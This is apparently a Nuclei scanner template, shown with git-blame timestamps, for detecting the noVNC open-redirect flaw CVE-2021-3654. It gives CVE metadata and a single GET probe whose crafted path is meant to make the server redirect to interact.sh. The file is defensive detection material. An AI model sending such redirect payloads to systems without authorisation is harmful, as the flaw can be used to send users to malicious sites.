2021-09-28 01:53:50 +00:00
|
|
|
id: CVE-2021-3654
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: noVNC Open Redirect
|
|
|
|
author: geeknik
|
2022-03-11 09:46:35 +00:00
|
|
|
severity: medium
|
2021-09-28 01:53:50 +00:00
|
|
|
description: A user-controlled input redirects noVNC users to an external website.
|
2021-09-28 01:58:51 +00:00
|
|
|
reference:
|
|
|
|
- https://seclists.org/oss-sec/2021/q3/188
|
|
|
|
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://bugs.python.org/issue32084
|
|
|
|
- https://opendev.org/openstack/nova/commit/04d48527b62a35d912f93bc75613a6cca606df66
|
2022-03-11 09:46:35 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2022-03-11 09:46:35 +00:00
|
|
|
cve-id: CVE-2021-3654
|
|
|
|
cwe-id: CWE-601
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: redirect,novnc,cve,cve2021
|
2021-09-28 01:53:50 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
|
|
|
|
path:
|
2022-06-06 10:40:15 +00:00
|
|
|
- '{{BaseURL}}//interact.sh/%2f..'
|
2021-09-28 01:53:50 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-06-06 10:40:15 +00:00
|
|
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
2021-09-28 01:53:50 +00:00
|
|
|
part: header
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 302
|
|
|
|
- 301
|